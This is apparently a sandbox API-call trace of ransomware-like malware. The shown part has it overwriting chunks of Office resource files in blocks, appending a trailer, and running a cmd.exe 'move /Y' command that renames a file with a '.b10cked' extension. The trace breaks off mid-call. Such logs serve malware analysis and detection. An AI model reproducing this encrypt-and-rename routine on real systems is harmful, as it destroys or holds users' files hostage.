hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x115678 [0160.823] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x115b60 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x115b60 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0160.854] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.875] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.878] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0160.879] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0160.879] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.880] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.880] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0160.880] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0160.880] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.896] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.897] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0160.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0160.899] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.899] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.900] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0160.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0160.900] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.932] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.937] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0160.938] SetFilePointer (in: hFile=0x114, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0160.938] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.945] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.945] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0160.945] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xf5b60 [0160.946] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.946] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.947] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0160.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xf5b60 [0160.948] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.948] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.949] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0160.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0160.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WWINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0160.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x115b60 [0160.953] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0160.953] CloseHandle (hObject=0x114) returned 1 [0160.963] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX") returned 0x3c [0160.964] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0160.965] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x978, dwThreadId=0x208)) returned 1 [0160.967] CloseHandle (hObject=0x1b4) returned 1 [0160.967] CloseHandle (hObject=0x114) returned 1 [0160.967] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0160.967] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0160.967] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0160.967] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.967] ReleaseMutex (hMutex=0xf8) returned 1 [0160.967] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.967] ReleaseMutex (hMutex=0xf8) returned 1 [0160.967] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.967] ReleaseMutex (hMutex=0xf8) returned 1 [0160.967] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.967] ReleaseMutex (hMutex=0xf8) returned 1 [0160.967] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.969] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21775830395) returned 1 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x25360 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.971] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.971] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.971] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.971] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.971] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x24e78 [0160.971] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x25360 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x25360 [0160.972] SetFilePointer 